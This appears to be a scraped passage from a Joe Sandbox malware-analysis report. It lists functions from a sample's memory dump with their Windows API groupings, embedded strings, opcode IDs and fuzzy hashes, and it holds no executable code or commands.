                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentVariable
                                                              • String ID:
                                                              • API String ID: 1431749950-0
                                                              • Opcode ID: f36f728fb68e9c030c92917883890652b287511953764533778c77d950d1811c
                                                              • Instruction ID: ab6ea35cc4c4ca181117cfceb55a371778b923cb2c6d718499f93cc637994782
                                                              • Opcode Fuzzy Hash: f36f728fb68e9c030c92917883890652b287511953764533778c77d950d1811c
                                                              • Instruction Fuzzy Hash: 3BC08CA0B1370082FC0FD30BAC943E022E16F0D3C1EC04129AA0C0B338EB3D80944700
                                                              Function 0000000140010FFC Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Free
                                                              • String ID:
                                                              • API String ID: 3978063606-0
                                                              • Opcode ID: b403f4cd7e6b1ea5231d56a542ea7710078fdd6c3183311bb8828c9ff7a2dcca
                                                              • Instruction ID: 3be53cbf4efc602c07d04e61f546686734bccd281855bf9d316eb8d3f4bb89d6
                                                              • Opcode Fuzzy Hash: b403f4cd7e6b1ea5231d56a542ea7710078fdd6c3183311bb8828c9ff7a2dcca
                                                              • Instruction Fuzzy Hash: E3D0E97091558096F66BA747EC857E422A2B7AC3C5F500419E3050B1B28ABE49DDEA15
                                                              Function 000000014000DC88 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory
                                                              • String ID:
                                                              • API String ID: 1611563598-0
                                                              • Opcode ID: 93ac6205523c289b50a33b5b006d9a2b969cc6c5ca2cd3404325313acfcde68d
                                                              • Instruction ID: d26b75307fbf4d2f65b3bf59e092d1c76b80437de534da0d48005b48f8adbafa
                                                              • Opcode Fuzzy Hash: 93ac6205523c289b50a33b5b006d9a2b969cc6c5ca2cd3404325313acfcde68d
                                                              • Instruction Fuzzy Hash: 74C09B74663002C1FA6A936328A97E451905B0C391F504511F7064117089BD14975530
                                                              Function 000000014000C980 Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CreateHeap
                                                              • String ID:
                                                              • API String ID: 10892065-0
                                                              • Opcode ID: 3010fbf55b21657f3d2da30d78e3fc06337a299998e6cc7e6108e39cc3db3a27
                                                              • Instruction ID: 2c080862c33f0b7fb519294060e944d109da0d65108c87cfa11e07f441f421b0
                                                              • Opcode Fuzzy Hash: 3010fbf55b21657f3d2da30d78e3fc06337a299998e6cc7e6108e39cc3db3a27
                                                              • Instruction Fuzzy Hash: 40C02B34712690C2E3492323AC033991090F34C3C0FD02018F60102770CE3D80A70B00
                                                              Function 000000014000C6B0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: ExceptionHandlerRemoveVectored
                                                              • String ID:
                                                              • API String ID: 1340492425-0
                                                              • Opcode ID: d65e708e3fd015015f13c97e564679718939e1a537f1569a86aba6eef632a387
                                                              • Instruction ID: 43e8ab96d0ef540813763e0684213002212cef3b8ee59004a75f8fb70944dace
                                                              • Opcode Fuzzy Hash: d65e708e3fd015015f13c97e564679718939e1a537f1569a86aba6eef632a387
                                                              • Instruction Fuzzy Hash: 30C08C78B03B0085FA4AEB03B8883A422606B8C7C1F800008E60E037328E3C04A54780
                                                              Function 0000000140012520 Relevance: 1.3, APIs: 1, Instructions: 11COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Value
                                                              • String ID:
                                                              • API String ID: 3702945584-0
                                                              • Opcode ID: c164aa80badfc177248d89438e49745db99a56b8fb9d29675fc464102b6282a0
                                                              • Instruction ID: b586a9c78aaa43fddf3ec091a8dff657c7d1e7c92e3b3169bdbbaf5832d2cb3a
                                                              • Opcode Fuzzy Hash: c164aa80badfc177248d89438e49745db99a56b8fb9d29675fc464102b6282a0
                                                              • Instruction Fuzzy Hash: ACD06C36614B84C3CA249B06E85135973A0F788B88F900215EA8D0B734CF3DC222DB00

                                                              Non-executed Functions

                                                              Function 000000014000B758 Relevance: 72.0, APIs: 35, Strings: 6, Instructions: 272windowmemoryregistryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Window$Message$CreateHeapSend$Freewcslen$Accelerator$LoadMetricsSystemTableTranslate$AllocBringClassCursorDestroyDispatchEnableEnabledFocusForegroundIconLongObjectRegisterStockwcscpy
                                                              • String ID: BUTTON$C$EDIT$P$STATIC$n
                                                              • API String ID: 9748049-1690119102
                                                              • Opcode ID: c01de26334065d18653497f5b45086f7b5809085fdd55da687512dab041c8858
                                                              • Instruction ID: f11a45e4f50ece19de517c67b98e9e797584e7b20c87343cc1d5b6865565d8d0
                                                              • Opcode Fuzzy Hash: c01de26334065d18653497f5b45086f7b5809085fdd55da687512dab041c8858
                                                              • Instruction Fuzzy Hash: 4DD134B5605B4086EB12DF62F8447AA77A5FB8CBC8F444129EB4A47B79DF7DC4098B00
                                                              Function 0000000140013021 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 381COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $header crc mismatch$unknown compression method$unknown header flags set
                                                              • API String ID: 0-4074041902
                                                              • Opcode ID: 63d14d99d44cc3d14528aba0519c32bd687ffcf0a398d873a188d18be175c855
                                                              • Instruction ID: dac418b812a3de41c7c7b5072b67fa498c356b49e4a588b682982c80ed946ec6
                                                              • Opcode Fuzzy Hash: 63d14d99d44cc3d14528aba0519c32bd687ffcf0a398d873a188d18be175c855
                                                              • Instruction Fuzzy Hash: 4DF19C726007508BEB268F1AC48CBAE3BE6F7487C8F064519EF8A4B7A4DB76C555C740
                                                              Function 000000014000BC94 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 115libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeLibraryProcwcslen$InitializeLoadTaskmemsetwcsncpy
                                                              • String ID: P$SHBrowseForFolderW$SHELL32.DLL$SHGetPathFromIDListW
                                                              • API String ID: 217932011-4219398408
                                                              • Opcode ID: 39b50941fe3cb3f8533201b67178e799832ef7c6affe56ff9212f5b17596b26d
                                                              • Instruction ID: 4189c401249be1c18680961fdd5f00b64fd9ff4c66db3fab09ee0cba437a9a89
                                                              • Opcode Fuzzy Hash: 39b50941fe3cb3f8533201b67178e799832ef7c6affe56ff9212f5b17596b26d
                                                              • Instruction Fuzzy Hash: 6C418F72211B4086EB16EF12F8447EA73A4F78CBC8F544125EB49477A5DF39C55AC700
                                                              Function 000000014000DB18 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 107libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrarywcscatwcslen$AddressAllocHeapLoadProcTaskValuewcscpy
                                                              • String ID: Downloads\$SHGetKnownFolderPath$Shell32.DLL
                                                              • API String ID: 1740785346-287042676
                                                              • Opcode ID: 1a17e227a26f4eede426f334c2ee746aae7c8b1e13925a610746eba211cb8f63
                                                              • Instruction ID: 39544a34e48b1591535f5ec23c8084432afafb0fbbbedabb5ee694640fe7ccea
                                                              • Opcode Fuzzy Hash: 1a17e227a26f4eede426f334c2ee746aae7c8b1e13925a610746eba211cb8f63
                                                              • Instruction Fuzzy Hash: A94184B1214A46C2FA26EB57B4A4BF97291AB8C7D0F540127BB0A0B7F5DEB9C841C610
                                                              Function 0000000140016CC4 Relevance: 19.6, APIs: 13, Instructions: 81memoryregistrythreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocCriticalCurrentSection$HeapProcessValue$DuplicateEnterHandleInitializeLeaveObjectRegisterSingleThreadWait
                                                              • String ID:
                                                              • API String ID: 298514914-0
                                                              • Opcode ID: 1b9229a9ff34361a6518eb59eadc8af634e0fb6f78aa303e2f888cecdd8f7a24
                                                              • Instruction ID: 65bd0fc00ed65caac6c8ae18375092c396c339aa9c4fc9a556ba9f8eb5a1fbfe
                                                              • Opcode Fuzzy Hash: 1b9229a9ff34361a6518eb59eadc8af634e0fb6f78aa303e2f888cecdd8f7a24
                                                              • Instruction Fuzzy Hash: F141E132205B408AEB129F62EC443E977A0F78CBD5F484129EB490B774DF39C959D740
                                                              Function 0000000140008260 Relevance: 13.7, APIs: 9, Instructions: 249COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: _wcsdupfreewcsncpy$Value
                                                              • String ID:
                                                              • API String ID: 1554701960-0
                                                              • Opcode ID: 1d879e7a0acd0c0829ed1bc558ef67cfa511ed4a967529a3de4af1c33dacc62b
                                                              • Instruction ID: 9aa5ebfb9d0338231e5de8689cc7ecd01d3be8732c0a46cca62a2a5aa1271af7
                                                              • Opcode Fuzzy Hash: 1d879e7a0acd0c0829ed1bc558ef67cfa511ed4a967529a3de4af1c33dacc62b
                                                              • Instruction Fuzzy Hash: FB91BFB2604A8185EA76DF13B9507EA73A0FB48BD5F484225BFCA476E5EB38C542C701
                                                              Function 0000000140011AB8 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 53librarysleeploaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Library$AddressFreeLoadProcSleep
                                                              • String ID: 0w$InitOnceExecuteOnce$Kernel32.dll
                                                              • API String ID: 938261879-4269124590
                                                              • Opcode ID: 9cc1215efa9171b7dae7fadfb2c47d350fa49a6ad5bcb444afd81da3a54d843a
                                                              • Instruction ID: 258e5301f75bcfa7e340e12184f2e3f20ed82b399a9dd39da3854f47a4428b06
                                                              • Opcode Fuzzy Hash: 9cc1215efa9171b7dae7fadfb2c47d350fa49a6ad5bcb444afd81da3a54d843a
                                                              • Instruction Fuzzy Hash: AB118F3120974585EB5ADF57E8843E973A0FB8CBD0F488029AB0A0B666EF3AC595C340
                                                              Function 000000014000B64C Relevance: 12.1, APIs: 8, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Window$ClassDestroyEnableProcUnregister
                                                              • String ID:
                                                              • API String ID: 1570244450-0
                                                              • Opcode ID: 91bde67e80f91e2742b9164cbcf556c590c39b782bd753c692008bc4014d2561
                                                              • Instruction ID: 9942cbda7600913111d3f6e009e2264a98590d225334710fbbc2bdadcd09b10d
                                                              • Opcode Fuzzy Hash: 91bde67e80f91e2742b9164cbcf556c590c39b782bd753c692008bc4014d2561
                                                              • Instruction Fuzzy Hash: F121F9B4204A5182FB56DB27F8483A923A1E78CBC1F549126FB4A4B7B5DF3DC8459700
                                                              Function 000000014000BEA0 Relevance: 12.0, APIs: 8, Instructions: 44threadwindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Window$Thread$Current$AllocEnableEnabledForegroundHeapLongProcessVisible
                                                              • String ID:
                                                              • API String ID: 3383493704-0
                                                              • Opcode ID: 58dc5949c501ee915ee066136f95cf395d457a23a7ff8083782f65faeab631ed
                                                              • Instruction ID: 80f857dfb6a9a2f530fca3cb10c8fb692f8ca5f83b5b0ec86a1534c3d91aadad
                                                              • Opcode Fuzzy Hash: 58dc5949c501ee915ee066136f95cf395d457a23a7ff8083782f65faeab631ed
                                                              • Instruction Fuzzy Hash: 9D11397020064182EB46AB27A9483B962A1EB8CBC4F448024FA0A4B6B5DF7DC5458301
                                                              Function 00000001400117FC Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 99memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$AllocHeap$EnterInitializeLeave
                                                              • String ID: 0w
                                                              • API String ID: 2544007295-4020514967
                                                              • Opcode ID: 964df89806ab1b98e43ea449fff5c56c6dda4054a8aa2c3e42b83df1ec0c2f38
                                                              • Instruction ID: 3c708bd0e8d6be70d523372ffb5b6a2e3cd9d0d7dbc1ea7b56162c86fa93b61b
                                                              • Opcode Fuzzy Hash: 964df89806ab1b98e43ea449fff5c56c6dda4054a8aa2c3e42b83df1ec0c2f38
                                                              • Instruction Fuzzy Hash: 5E413932605B8086EB5ADF56E4403E877A4F79CBD0F54812AEB4D4BBA5DF39C8A5C700
                                                              Function 000000014000BF44 Relevance: 9.1, APIs: 6, Instructions: 63threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Window$CurrentThread$EnableEnumWindows
                                                              • String ID:
                                                              • API String ID: 2527101397-0
                                                              • Opcode ID: 819563b769547833593462bfdd9e557783e2fe60f6ea2978649c293be4a90c74
                                                              • Instruction ID: 08829170a8ee5f1b49cfdf050f6537c1ef42b3a6330418e8cb94bb4851fba9f1
                                                              • Opcode Fuzzy Hash: 819563b769547833593462bfdd9e557783e2fe60f6ea2978649c293be4a90c74
                                                              • Instruction Fuzzy Hash: 6D3171B261064182FB62CF22F5487A977A1F75CBE9F484215FB6947AF9CB79C844CB00
                                                              Function 00000001400110DC Relevance: 9.1, APIs: 6, Instructions: 62memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocValue$Heap
                                                              • String ID:
                                                              • API String ID: 2472784365-0
                                                              • Opcode ID: 817cb6a234a385814b06518aa112c5efe756708d8e68811ae307d73ca14c2163
                                                              • Instruction ID: 773301f083ee798336704ec3d5312664b9b868eef9dc2a5d6ba13fea1fa7b4fd
                                                              • Opcode Fuzzy Hash: 817cb6a234a385814b06518aa112c5efe756708d8e68811ae307d73ca14c2163
                                                              • Instruction Fuzzy Hash: 3821F434200B8096EB4A9B92F8843E963A5F7DCBD0F548429FB4D47B79DE3DC8858740
                                                              Function 0000000140007284 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$CloseCreateEnterHandleLeaveObjectSingleThreadWait
                                                              • String ID:
                                                              • API String ID: 458812214-0
                                                              • Opcode ID: 6a38117e792cc01899f22305820c9a0c290a6e73bcc29c544877765eca75b33b
                                                              • Instruction ID: 6ed0f769cbd5916c92599595d34faf5ec2fc13e913d525d246d608b89e2aac48
                                                              • Opcode Fuzzy Hash: 6a38117e792cc01899f22305820c9a0c290a6e73bcc29c544877765eca75b33b
                                                              • Instruction Fuzzy Hash: FD210076204B0081EB06DB22E8943E973A4FB8CBC4F988026EB4D47779DF39C946C340
                                                              Function 0000000140011968 Relevance: 7.6, APIs: 5, Instructions: 51memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814939105.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1814978834.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000012.00000002.1815015404.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$FreeHeap$DeleteEnterLeave
                                                              • String ID:
                                                              • API String ID: 3171405041-0
                                                              • Opcode ID: 5bac674c3f8342d6cd0aac8621eb4a2ebf53081d1a9cae62f807694b4d99e6ae
                                                              • Instruction ID: 030e86aa03d9d600b90796447865b7023312810cb66964dcc71f9bcfbca43c2c
                                                              • Opcode Fuzzy Hash: 5bac674c3f8342d6cd0aac8621eb4a2ebf53081d1a9cae62f807694b4d99e6ae
                                                              • Instruction Fuzzy Hash: 4721E735201B4485EB4ADB57E5903E823A4F78CBC4F444115AB5E0B7B6CF3AC4A5C340
                                                              Function 000000014000E824 Relevance: 6.3, APIs: 5, Instructions: 92COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.1814906077.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000012.00000002.1814875575.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
